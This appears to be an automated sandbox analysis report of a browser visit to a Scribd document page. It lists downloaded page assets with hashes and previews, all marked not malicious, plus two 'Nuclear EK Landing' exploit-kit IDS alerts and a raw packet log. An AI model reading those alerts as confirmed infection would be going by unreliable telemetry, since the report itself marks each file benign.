                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11734
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9832092385431075
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:3Hc5Tp51hBNO4RJyAe/yUe5Kwh+5VIpsX4x6ZqIuN5jsyHsdQf2i9ec7C/5ZleMi:3HaT/vJ4AeTUEVMTIuN5XHua2AesCzB8
                                                                                                                                                                                                                                                                                                                                                                                        MD5:06919B1996AFBECDC449F064E555C597
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CE4ACBE881215E5EECD0B9F6465572B4456751C7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:65A60B25566A96BD631B1F1366835179C46A58BAB3B588D38EDF80E4AA2DD82A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8F471027167EF5B193A266FD57740DCE887508AC285731CBF0536B601A3E612289B4CB640B313A488778123C7C962B4DF9272D15187BF592549DF64370EF25F4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE.......h~.....................................h{............................g~.hv.......................)............VUW.............. @@C.......k..g.............f_b........&...m`b...td`.g~.ctFFJ..%.ua.. ....rfCAH.....i]Y..n~kf.ma?>;....jwtia.dz.0.....7......QNR...KJO..+NII..i;+...v.~q......YM...-.vi......C7.....!..-..!..j..........(."......,..{..!....-..)........<......RF...(.0.iy...kd`....sl.......#.......v...$../..+^[\..d..t..$..Q..'F...wkzq.......M=.&...d...."nw/z...8..A..6hU...2....6..t.........v.V..r..3 v..."kVL4..zq#....;.lRl_.H.w/&...M....Q..'...7....'qe....G....]..7X........j......."^W.`VP..P......-n.%a^`..ZX.p..)..r.....co.......U..].p,A.{o.=.....?..4q.)..(..+..|....g..Y..9s.a[..ue)..[.....Q.....ASI8..:n.^n..].8..Lq.q..\[oO..v.....S..... .IDATx..Ml.....-0.. ..RiH.^.P0.....G.B......aF@..J..*.C.K.b$.@.Z.5.J9.H{..,..,WD...T./...9x.........Y5....c>.3..........J......N5..s..ht..l.EAJ.rkk
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48664)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):48944
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.272507874206726
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                                                                                                                                                                                                                                                                        MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):7206
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.968412822831704
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:9Eo8rhQocDGWv5Y3P66CAOSQE7tKphn6bF:KdmQwC6BAKv6
                                                                                                                                                                                                                                                                                                                                                                                        MD5:56C0DC871198BD3569B1C2DCD3B1A356
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:324507CA1D7DC3E907B0D9AD0D0599255D9E8AAC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6467564E529004819A833461849CD955B27AA4430E3A166339201A21014FADB3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EB085231C84FE1028C65F4FEB5BD19E5CE9046F8D77B9F0B4F50FD2BF617EB4F90C79B0704D6679C8B653AC50B69D7CD9B6320E96BC08FC6B91B436A38F27AEE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/322011391/149x198/14bbaf98d5/1733344475?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 ....0a...*....>m,.E.".....@........B....t......_*.......u...P<......W.......{....G...g.w.7.......{....7.7.......g=......i.#./..... .............?.W.o...]?.o......p...l.............Z.V...).E......M~g..._.<..M...?.....~A..u.c.....~k.A....`..../.............~.....C.G...r(.v...w.V.n..0.L]`E..:..R.h.e...q.X.;Z.....8..x...c.1......4..u..vh..9.:%.E....f@.N.u.W.[..y..q.....q!0.y.N.....j.....6..6...|. .7(.nWw...:.k .%B....J:.(....L....!.gl(..0.ex..FE.h.s.Z).....3....W.7^..v...<...N&........H...5.t...A.?.."Ur.%...'&......x@..h...Lvj....Z.....Uc..WG..Vw.....gh.:...#.3L&.I.n"..O,/..2..s....+. Wy7;.7._...!.._p.^...q.X.a.k..&g..e....(.U..^D..f..a...Y.....#.;f.E@b...4h...X.R....7.oW'B.1k...8..1.+f..<..t....\k5......x.s%....kq...`...C........O.|f.......|.@..2....G...).j.S.f...."-..,|=__.....O.....!..EC.D.cx.-.|.......y.E.U..,i.o.Q=.J...Vb....M.....z.#).h....}.....{.R.<n<.T..... .5?...%..L..&9..7....`z.7...O.!...@}...+.B.es}.....".[.O.uI..j
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (56702), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):56702
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.734674130742487
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:MOm8WmaPmCchb0lJUrO4lssCp6Q+HfXApehuhQgKFQ0hI3XZWHgXivxNgStx7KqV:QY
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DDA2756451E9368C94E464FF967136A1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AAE5806F6EC34E9E26F68314DEB7182C49FD15CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BD74CAFA69F2237482ADC4C5B78FCA859D260A3025E7A6BBFF43E102EF0FDC5D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9C271F4418160C3B6CBB9D5E9E029C092E4AE1AAF8E1CC824AB865EA005F7AD4701BD6E02AB21D725C3FE2B4D9632F15CBE7EC3966047172C7D9E6A1D0ECBCF8
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/monolith/105.02924deb17e63c446344.css
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */:root{--color-brick-100:#f1e3e3;--color-brick-200:#cfbcbc;--color-umber-100:#f4eadb;--color-umber-200:#e4d7bf;--color-flax-100:#f6f4e3;--color-flax-200:#e9e5c6;--color-jade-100:#eaeee7;--color-jade-200:#becab4;--color-stone-100:#e1eaec;--color-stone-200:#b7c9cc;--color-spruce-100:#e3e8ef;--color-spruce-200:#c7cfdc;--color-iris-100:#efebef;--color-iris-200:#b9abb9;--color-wheat-100:#f1eee6;--color-wheat-200:#ded9cd;--color-ash-100:#f1f0f0;--color-ash-200:#d1d1d1;--color-teal-100:#e4f4f5;--color-teal-200:#509ba8;--color-teal-300:#1e7b85;--color-teal-400:#0e6069;--color-teal-500:#09464d;--color-cabernet-100:#f9e2ee;--color-cabernet-200:#c20067;--color-cabernet-300:#a9085e;--color-cabernet-400:#87064b;--color-cabernet-500:#5d0534;--color-ebony-5:#faf8f7;--color-ebony-10:#e9e8e7;--color-ebony-20:#d3d2d0;--color-ebony-30:#bcbbb8;--color-ebony-40:#a6a4a1;--color-ebony-50:#908e89;--color-ebony-60:#797772;--color-ebony-
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13325
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9796159789828645
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:vNgtG5065HoEhekQAwTGl/5GP4uoCvrfoWd8FGHxWWrjcmESxN7GF2qiv4yuEqKE:v6tGdloEcG6ZvrwItV7GF2qdEvJu
                                                                                                                                                                                                                                                                                                                                                                                        MD5:151D0856000BF432212241A57397DE81
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:90330375E37D6C0057D5B10BAF4AF1C5CE5897A9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:735DF2B12427F46B3FACC8789E22F15922EA129C97BC1ED54A97BA004B86D97A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A4BF084FA892CEFE1409C63544C7F7F31BCD3AFD3F1439170026B6DA24E83A98821BEA3EFF4B2FA2F87113DC3DF25735F5B909D968CEC0EE98BEE896F855E741
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE......0|..............|.2|.................|.,|.,~.)........3|..6Z......0}..........,|....3|.............-~..../|..~....0{.5z.............3z..3W......2z..7^.4S...2|.4|.....4_..................1z.....7W7......5Z3z....(...........>{....2|..../|....-~..7Z,{....l............3N......)................;{.......z.............0~....:x.6Lh......$6\...Wg~...-~......u..,~.......c..t...p7...mw.4w.lz....,@^*~._o..k+...........3Zq..<u..........9z.......k{....$6QMa}Q.........k7LZm....zH............3I^.................E......J..AUm....g.....)>U......U..r..E..}..bu.....O.~......]fo...........j)...........z.................c...nEj..Sbo._.n7....N.zL....vM.c4....a..............._....vo......^.......v.c#..y..o..z.......mD.Qu.CZt...,b....({..v... .IDATx...k....e.`.*.........`.,....2/{.F..E.E...k..Cu.ZcPe.C..VX.l.V.c.>9.J.E....|.K...._H/.y..-.d.....#.y..}.......E.B......P....EEL..^.a....1PP ...
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 26448, version 0.0
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):26448
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.991124941109088
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:wNThIOtlamjMfopO3mvnQtZEdd9wDwKp5+4V1mv:wN1l9MAnItCYY
                                                                                                                                                                                                                                                                                                                                                                                        MD5:023D1A1B4F8D6019B1AE1A9FA19483AC
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:146B99193E327ADC2C16D2C5044BAA282821D978
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D1BB89B263061363CEB33944389DA5DEE8D2C2F13E98F02B898D6DC06B25B4AD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A92B1B65D6D2E340651E398CF229F280633CDCDAC3A435871851CB8A0427389F1B4B00F9B476FD50061A7FD2D2E8B7EF262D70E3BE50481DF9FBF4ED3611D2D3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/assets/fonts/icons/icons.d2ecf18b.woff2
                                                                                                                                                                                                                                                                                                                                                                                        Preview:wOF2......gP..........g..........................`.\.....P..<.6.$..x..>.. .... ...3.Ay.F...U..@.q .l.8....1.v.....r...!w....d....@R..&9..k.....i..g`..........s.$7...).T..6.Z..5..T(2.......a#...B...0.t..{..S... ... ......]Q.D.J.C.f4.-...|!....@../.d..,..!..$@H.;.2.K..1d.....J.*.G.....X..qV.'...j.hk.R...~hw6s*.~VG........i}..@..$U....,q...w'v,[[5.....UR...8v.`.....'....=.'ECO...{.z.N.........@..$....U..?.O...L._..U^..C%S\.@1...HO.z.o.U...;4k..V{.Kgt.$.........?........d.....A..g.."..d...HZ'.:...(.H....=c..6.f....E.........kH^BP.V.-(. ...~{|..w...L.3n.XJS.1.S...o..V....D.*.d=.....0.....7T.`.t4@7...?..D..c.....4.=|dD..".:..w.|".....q........^....I3.`.l..w.w....N.....".y...m.}.@....M.`..............=.QRT.).".9M..@] $.T..J).k3..K..^.G.......CN@...In..U.*.....jZ..K.I4.MT*{.K.8^.b.'1!R..7Q".. .P.v.....2....%..D.....:.$..@eb..#d..I.....+S....Xq1....S....U..>b..,...F.-.......kw..m&.3.. .`6.$.e.F...._..e..G..m...9.!,M....y...K.T..;........1@.g:.f.@m....`GCM.N..O.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4852), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4852
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.806929672822238
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:1gv6vV0qSkxO9D06lUUTz9NnSzZhFt8vf1dtzlTagjV6B:1dCqSF9Q6RX9hq0zBjVo
                                                                                                                                                                                                                                                                                                                                                                                        MD5:797E2ACB2F79A4E07BA15B76F121ADF2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:69C8EA9F70BB7676A604E6191536B651B5AAD9C3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BD5AD509C68A30910541A73EBBB8D869FC7621A99D0DBCA1797D3B88B62E213C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:52781C59EFC066E0F502DF2393A186102216A9350A7C164DADF56E92CA2F758A84ABA94CBE4C1D19284F14B5B8D19D1493A4106448B9D7B0B3FF74997EB48F08
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/991817613/?random=1733522375967&cv=11&fst=1733522375967&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13227
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9746925751699
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:zWlCknb+GwcSoYlCbcSSh7HziDnet8Kh+MvSMd3:iJnb+vQb0VTYnISMd3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4C1698090C797BD87F25D8762441D36C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D101313F01119693E8F279AE3B43C4AEE5C806D1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CBE9047879F138507C3F5BB08EB8E03BECCFF4C55A476509F4C770DA4C68E8F1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8F6CE106539E5AFDB082906360243C8F9BC855F146B85BCF5652BDDEEE3A40C2B5B8618357017191365C289B7C59B74C1993A4F39BD5281A967F2C57537CE1CB
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE". &.."."".#..."..$ "......x8#. . .w5.x9. ...#.."$...x< .$."$ "$....." ..v7.v8.x:'...z0...#."..'&...!.#..%..$.(.x>(...!.&...z9,...u=....zC.x<. .v1.u7.{=.z8.w/.x6....w4" .'"".y8!.'.w9...#..+ ...$#....'.vH$.$(.., .[F%2$.(..&.&.x>.vA.y4#.&+...{3,. .w@.v7.v="...u2.z5.x5.y0.#.."&.`9.{C(. .{=.v:0...w=".&.t@@0.(..D/.eL+=+.H4"..$.{9-)(.|A.|7.{D....v3.x@...2...t<.{@.v>oM-...rV0...2...|==..Q?".wF='..uK.l?8 .+.&.{;....w1....`2O7#zZ<8(..uHOKL.j?.......|4sX6.w@1...n;.uA?;9.yI...X@&.`;#.$.{JcL3XTUJ1.iL).f<G9 lijL9!......a_`K..l..A0 .{K.hD.nG.oB....g:GCD720.pF2/0....x1...ZB..f<.n7...~z{......]...8..........sZ<|[3....hH[K5G#..{RhN2bD'.........X<$...ypqz...gi....$-...X3#.......,.jS..)2.`D.VU.@.....O?+.4...IL=40.' ......k;k@,.89.S%.zeS=..b.WM.tw.lNu......x.vJ.......... .IDATx...OZY..).s.E`.......(.x.E..b..\.T.:n[t. ..c....1.:N..l..&.."3a`WJH.......6..}.4$........t.w.Gx./.....y..>.9..................!$(.`..0.m
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (22096), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):22096
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.1556985111456
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:BX0ZDdRzUjTFCa4oj2AlF8RrLPrGH/u2d2Cw25f80m92Nfx0K2Z2F2I02Kft0PEM:KZDdpUjwaPSA4gHMAZesNW4kacLi
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4EDDEEC95AFDA969B3D1B2FB970C1EB1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DA4C64223B6FF380F03AE2506DF526C22A9103D9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:42E2DD427DD9F9D45367C880C68289114B7DE56373FF8BDC664EA0FA3CE77880
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2D431F9BDB08263AB0BC0A596F13E35A136318DA42190EC08712FB1CF963A82EC56FD04231084C876F57853F5930E25F65B1F9D451BDDF140134C7C05F89A0C4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var t={228:t=>{var n=Object.prototype.hasOwnProperty,e="~";function r(){}function o(t,n,e){this.fn=t,this.context=n,this.once=e||!1}function i(t,n,r,i,c){if("function"!=typeof r)throw new TypeError("The listener must be a function");var u=new o(r,i||t,c),a=e?e+n:n;return t._events[a]?t._events[a].fn?t._events[a]=[t._events[a],u]:t._events[a].push(u):(t._events[a]=u,t._eventsCount++),t}function c(t,n){0==--t._eventsCount?t._events=new r:delete t._events[n]}function u(){this._events=new r,this._eventsCount=0}Object.create&&(r.prototype=Object.create(null),(new r).__proto__||(e=!1)),u.prototype.eventNames=function(){var t,r,o=[];if(0===this._eventsCount)return o;for(r in t=this._events)n.call(t,r)&&o.push(e?r.slice(1):r);return Object.getOwnPropertySymbols?o.concat(Object.getOwnPropertySymbols(t)):o},u.prototype.listeners=function(t){var n=e?e+t:t,r=this._events[n];if(!r)return[];if(r.fn)return[r.fn];for(var o=0,i=r.length,c=new Array(i);o<i;o++)c[o]=r[o].fn;return c},u
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):200
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.942373347667344
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:qTkIDZxVsJYkup3XyHFeTrAyTKTWKMrBKblbJ4ZNDpVbz2USrGXI9kBbZ6iF4:qTjxVgYkYv3J/14QpcUAVuB965
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3437AADDCDF6922D623E172C2D6F9278
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F69066CF20141AC93418102D3EEE7C0225B8A623
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:35DCC382EB69D00369D708708CDC545F3968B68FA5BBE3E728D11FEDD04F93BB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2DAE5C5C30C6A0E763D8128F2CE1D467EAD432E582AB4EBB68E23991DB08F57490ABC0EED805FD33FAB5503C1737D9D47D4CC1090AE15D7391593FBB295D66E7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<!doctype html><html><head><meta charset="utf-8"/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js"></script></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                        No static file info
                                                                                                                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06T22:59:38.487607+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.1649830162.159.140.229443TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06T22:59:38.688648+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.1649835104.244.42.131443TCP
                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:09.113286972 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:09.415883064 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:10.021887064 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:11.231882095 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.581748009 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.581794024 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582058907 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582149029 CET49711443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582190990 CET44349711151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582253933 CET49711443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582398891 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582412004 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582674026 CET49711443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.582686901 CET44349711151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.641973972 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.825762033 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.826087952 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.826118946 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.827056885 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.827132940 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.828310966 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.828325033 CET44349711151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:13.828372002 CET44349710151.101.194.152192.168.2.16
